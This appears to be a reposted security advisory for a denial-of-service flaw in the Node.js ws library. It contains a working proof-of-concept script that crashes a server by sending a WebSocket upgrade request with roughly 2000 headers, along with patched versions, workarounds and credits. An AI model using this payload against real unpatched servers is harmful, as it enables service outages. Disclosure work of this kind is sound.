ws affected by a DoS when handling a request with many HTTP headers #3

[edamame-maru]

Impact

A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server.
Proof of concept

const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;

for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;

for (let j = 0; j < chars.length; j++) {
  const key = chars[i] + chars[j];
  headers[key] = 'x';

  if (++count === 2000) break;
}

}

headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';

const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});

request.end();
});

Patches

The vulnerability was fixed in ws@8.17.1 (websockets/ws@e55e510) and backported to ws@7.5.10 (websockets/ws@22c2876), ws@6.2.3 (websockets/ws@eeb76d3), and ws@5.2.4 (websockets/ws@4abd8f6)
Workarounds

In vulnerable versions of ws, the issue can be mitigated in the following ways:

Reduce the maximum allowed length of the request headers using the [--max-http-header-size=size](https://nodejs.org/api/cli.html#--max-http-header-sizesize) and/or the [maxHeaderSize](https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener) options so that no more headers than the server.maxHeadersCount limit can be sent.
Set server.maxHeadersCount to 0 so that no limit is applied.

Credits

The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.
References

https://github.com/websockets/ws/issues/2230
https://github.com/websockets/ws/pull/2231

[MysteryFlask]

Fixed issue a long time ago.